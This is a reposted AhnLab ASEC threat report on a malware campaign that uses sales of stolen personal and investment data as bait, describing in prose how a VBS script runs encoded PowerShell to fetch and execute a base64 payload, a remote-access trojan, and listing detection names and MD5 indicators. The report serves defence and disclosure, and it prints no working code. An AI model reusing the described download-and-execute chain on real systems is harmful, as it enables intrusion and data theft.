Personal Information Sales Used as Bait to Distribute Malware

by Prapattimynk, Saturday, 2 December 2023 (3 months ago)
Personal Information Sales Used as Bait to Distribute Malware


AhnLab Security Emergency response Center (ASEC) discovered a case of malware distribution using personal information sales as bait. This attack case employs a social engineering hacking technique. ASEC provides you with recently discovered circumstances of malware distribution using social engineering hacking techniques.

Figure 1. Distribution site used by the threat actor

Figure 1 shows the content of the website used by the threat actor as a distribution site, with multiple files. Most of the files contain personal information, and the file names include investment-related keywords such as ‘reading,’ ‘unlisted,’ ‘day trading,’ and ‘mid to long term.’

Figure 2. coin.xlsx file content
Figure 3. DD10.25.xlsx file content
Figure 4. 10.25kaka.xlsx file content

On the malware distribution site, the threat actor had files with numerous pieces of personal information amounting to over 8,500 in total. Aside from names and phone numbers, there were also files with personal investment amounts and credit ratings.

Figure 5. Initial distribution script
Figure 6. win64.vbs script content
Figure 7. PowerShell command run by win64.vbs

Such personal data was confirmed as being used by the malware distributor and disguised as being for sale to propagate malware (see Figure 5). The script in Figure 6 which performs the actual malware infection behavior and the personal data file are downloaded and executed. Since the malware executed is not shown as a script and the personal information file is opened, it is difficult for the user to recognize the malware infection.

Figure 6 shows the content of the file win64.vbs that appears in the Figure 1 list. Encoded strings are substituted, decoded, and run through PowerShell. The executed command is fairly simple: it reads the string in the textbin address and decodes it in base64 to execute it. Ultimately, the command downloads and runs the file base64.txt in the list shown in Figure 1.

Figure 8. Part of the executed malware features

The executed malware has the same features as RAT types which allow remote control. Its features include autorun registration, executing scripts, downloading additional files, executing these downloaded files through Regsvcs.exe, (a legitimate process), and performing reverse connection.

This post examined the circumstances of malware distribution using personal information as bait. The files covered in this post contained multiple keywords such as ‘reading,’ ‘unlisted,’ and ‘day trading.’ Such indiscriminately collected personal data are not encrypted when stored and can be reused for malware distribution when leaked. Users must practice caution against unauthorized group chats that provide investment information.

File Detection
Trojan/VBS.Runner (2023.11.21.00)
Trojan/Win.Agent.C426491 (2021.06.30.03)
Backdoor/Win.AsyncRat.C5372433 (2023.02.02.03)
Dropper/Win.Generic.C5499482 (2023.10.02.00)

Behavior Detection
Execution/MDP.Powershell.M2514

[IOC]
MD5
a377d92101121294088e02b01624f19c
ebaa2ad4d3b7e88424e9db4c860d7558
d3d5f947a872d50fd2addfecfa2b2276
27218824d5b1da553e3d65f2a4a0f974
f963a7bf7b1377d78813c90dd649f512
ebaa2ad4d3b7e88424e9db4c860d7558  

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.